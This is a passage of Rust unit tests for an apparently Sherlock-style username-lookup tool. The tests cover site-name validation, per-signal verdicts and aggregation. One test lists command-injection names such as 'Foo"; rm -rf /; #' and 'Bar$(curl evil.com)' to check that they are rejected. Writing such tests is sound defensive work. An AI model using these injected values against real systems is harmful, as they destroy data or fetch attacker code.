        let site = site_with(vec![Signal::RedirectAbsent {
            fragment: String::new(),
        }]);
        let message = site.validate().unwrap_err().to_string();
        assert!(message.contains("redirect signal"));
    }

    #[test]
    fn validate_rejects_shell_metacharacters_in_name() {
        // Background: the validate-sites.yml workflow used to pass
        // `--only "$name"` with `$name` taken from PR-controlled sites.json.
        // A name such as `Foo"; rm -rf /; #` would have escaped the `"..."`
        // quoting and run on the runner. Both the schema and this loader
        // restrict names to a safe character class; this test checks that a
        // representative set of dangerous characters is rejected.
        //
        // NOTE(review): "Qux\\nfoo" is a literal backslash followed by `n`,
        // not a newline — confirm whether a real newline case was intended.
        let hostile_names = [
            "Foo\"; rm -rf /; #",
            "Bar$(curl evil.com)",
            "Baz`whoami`",
            "Qux\\nfoo",
            "back\\slash",
            "pipe|ish",
            "semi;colon",
            "amp&and",
            "lt<gt>",
        ];
        for bad in hostile_names {
            let mut site = status_200_site();
            site.name = bad.into();
            let err = site.validate().unwrap_err();
            let rejected_for_charset = err
                .to_string()
                .contains("characters outside the allowed set");
            assert!(
                rejected_for_charset,
                "expected unsafe-name rejection for {bad:?}, got {err}",
            );
        }
    }

    #[test]
    fn validate_accepts_real_world_site_names() {
        // Sanity check against names that actually ship in the registry.
        let shipped_names = [
            "GitHub",
            "Steam Community (User)",
            "X / Twitter",
            "osu!",
            "Eintracht Frankfurt Forum",
            "Archive of Our Own",
            "Career.habr",
            "fl",
            "GitLab.com",
            "Sbazar.cz",
        ];
        for ok in shipped_names {
            let mut site = status_200_site();
            site.name = ok.into();
            assert!(site.validate().is_ok(), "expected {ok:?} to validate");
        }
    }

    #[test]
    fn validate_rejects_overlong_name() {
        let mut site = status_200_site();
        site.name = "A".repeat(100);
        let message = site.validate().unwrap_err().to_string();
        assert!(message.contains("longer than"));
    }

    #[test]
    fn validate_accepts_well_formed_regex_check() {
        let mut site = status_200_site();
        site.regex_check = Some("^[a-zA-Z0-9_-]{3,40}$".into());
        let outcome = site.validate();
        assert!(outcome.is_ok());
    }

    #[test]
    fn validate_tolerates_unsupported_regex_features() {
        // Regexes imported from Sherlock sometimes use lookarounds
        // (e.g. `(?!...)`), which Rust's `regex` crate cannot compile.
        // Such sites must still load: the username gate is silently
        // disabled instead of the whole site being rejected.
        let mut site = status_200_site();
        site.regex_check = Some("^(?![.-])[a-zA-Z0-9_.-]{3,20}$".into());
        let outcome = site.validate();
        assert!(
            outcome.is_ok(),
            "lookaround-bearing regex should warn, not reject the site"
        );
    }

    // ----- Per-signal evaluation ------------------------------------------

    #[test]
    fn signal_status_found_votes_only_on_match() {
        let signal = Signal::StatusFound { codes: vec![200] };
        let cases = [
            (200, SignalVerdict::Found),
            (404, SignalVerdict::Ambiguous),
        ];
        for (status, expected) in cases {
            let probe = Probe {
                status,
                final_url: "https://example.com/alice",
                body: "",
            };
            assert_eq!(signal.evaluate(&probe), expected);
        }
    }

    #[test]
    fn signal_status_not_found_votes_only_on_match() {
        let signal = Signal::StatusNotFound { codes: vec![404] };
        let cases = [
            (404, SignalVerdict::NotFound),
            (200, SignalVerdict::Ambiguous),
        ];
        for (status, expected) in cases {
            let probe = Probe {
                status,
                final_url: "",
                body: "",
            };
            assert_eq!(signal.evaluate(&probe), expected);
        }
    }

    #[test]
    fn signal_body_absent_votes_not_found_when_text_present() {
        let signal = Signal::BodyAbsent {
            text: String::from("Profile not found"),
        };
        let cases = [
            ("<h1>Profile not found</h1>", SignalVerdict::NotFound),
            ("<h1>Welcome alice</h1>", SignalVerdict::Ambiguous),
        ];
        for (body, expected) in cases {
            let probe = Probe {
                status: 200,
                final_url: "",
                body,
            };
            assert_eq!(signal.evaluate(&probe), expected);
        }
    }

    #[test]
    fn signal_redirect_absent_inspects_final_url() {
        let signal = Signal::RedirectAbsent {
            fragment: String::from("/login"),
        };
        let cases = [
            (
                "https://example.com/login?next=/alice",
                SignalVerdict::NotFound,
            ),
            ("https://example.com/alice", SignalVerdict::Ambiguous),
        ];
        for (final_url, expected) in cases {
            let probe = Probe {
                status: 200,
                final_url,
                body: "",
            };
            assert_eq!(signal.evaluate(&probe), expected);
        }
    }

    // ----- Aggregation ----------------------------------------------------

    #[test]
    fn aggregate_found_when_only_found_signals_fire() {
        assert_eq!(
            aggregate([SignalVerdict::Found, SignalVerdict::Ambiguous]),
            MatchKind::Found
        );
    }

    #[test]
    fn aggregate_not_found_when_only_not_found_signals_fire() {
        assert_eq!(
            aggregate([SignalVerdict::NotFound, SignalVerdict::Ambiguous]),
            MatchKind::NotFound
        );
    }

    #[test]
    fn aggregate_not_found_wins_over_found() {
        // Negative-priority rule: one NotFound vote beats a Found vote.
        assert_eq!(
            aggregate([SignalVerdict::Found, SignalVerdict::NotFound]),
            MatchKind::NotFound
        );
    }

    #[test]
    fn aggregate_uncertain_when_no_signals_fire() {
        assert_eq!(
            aggregate([SignalVerdict::Ambiguous, SignalVerdict::Ambiguous]),
            MatchKind::Uncertain
        );
    }

    #[test]
    fn aggregate_empty_is_uncertain() {
        let no_votes = std::iter::empty::<SignalVerdict>();
        assert_eq!(aggregate(no_votes), MatchKind::Uncertain);
    }

    #[test]
    fn needs_body_is_true_only_for_body_signals() {
        let status_or_redirect = [
            Signal::StatusFound { codes: vec![200] },
            Signal::StatusNotFound { codes: vec![404] },
            Signal::RedirectAbsent {
                fragment: "/login".into(),
            },
        ];
        for signal in &status_or_redirect {
            assert!(!signal.needs_body());
        }

        let body_based = [
            Signal::BodyPresent { text: "x".into() },
            Signal::BodyAbsent { text: "x".into() },
        ];
        for signal in &body_based {
            assert!(signal.needs_body());
        }
    }

    // ----- Deserialization ------------------------------------------------

    #[test]
    fn deserializes_signal_list() {
        let raw = r#"{
            "name": "GitHub",
            "url": "https://github.com/{username}",
            "signals": [
                { "kind": "status_found", "codes": [200] },
                { "kind": "status_not_found", "codes": [404] }
            ]
        }"#;
        let site = serde_json::from_str::<Site>(raw).unwrap();
        assert_eq!(site.name, "GitHub");
        assert_eq!(site.signals.len(), 2);
        site.validate().unwrap();
    }

    proptest::proptest! {
        /// Whatever the mix of per-signal verdicts, aggregation follows the
        /// negative-priority spec: a NotFound vote wins, then a Found vote,
        /// and with neither the result is Uncertain.
        #[test]
        fn aggregate_matches_negative_priority_spec(
            votes in proptest::collection::vec(
                proptest::prop_oneof![
                    proptest::strategy::Just(SignalVerdict::Found),
                    proptest::strategy::Just(SignalVerdict::NotFound),
                    proptest::strategy::Just(SignalVerdict::Ambiguous),
                ],
                0..16,
            ),
        ) {
            let has_not_found = votes.contains(&SignalVerdict::NotFound);
            let has_found = votes.contains(&SignalVerdict::Found);
            let expected = match (has_not_found, has_found) {
                (true, _) => MatchKind::NotFound,
                (false, true) => MatchKind::Found,
                (false, false) => MatchKind::Uncertain,
            };
            proptest::prop_assert_eq!(aggregate(votes.iter().copied()), expected);
        }
    }
}